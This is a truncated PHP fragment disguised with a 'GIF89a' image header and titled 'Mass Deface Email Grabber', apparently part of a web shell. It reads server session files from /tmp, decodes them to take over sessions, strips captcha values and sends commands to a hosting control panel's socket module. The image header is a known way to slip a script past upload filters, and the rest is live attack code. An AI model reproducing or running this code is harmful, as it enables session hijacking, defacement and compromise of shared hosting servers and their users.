GIF89a;
Mass Deface Email Grabber
$session){ $session_file = "/tmp/sess_$session"; if(file_exists($session_file)){ echo "session_file $session_file \n"; $contents = file_get_contents($session_file); @session_start(); session_decode($contents); unset($_SESSION['acp_captcha_code']); unset($_SESSION['ucp_captcha_code']); if(count($_SESSION) != 0){ continue; } $getcwd =__FILE__; $input="CreateDestroySocket\ndestorysocket\n$username\n$getcwd"; $value = ctrl_module::ConnectServerSocket($input,$daemon=false,$socket_timing=5,$withresp=false); }else{ $getcwd =__FILE__; $input="CreateDestroySocket\ndestorysocket\n$username\n$getcwd"; $value = ctrl_module::ConnectServerSocket($input,$daemon=false,$socket_timing=5,$withresp=false); } } }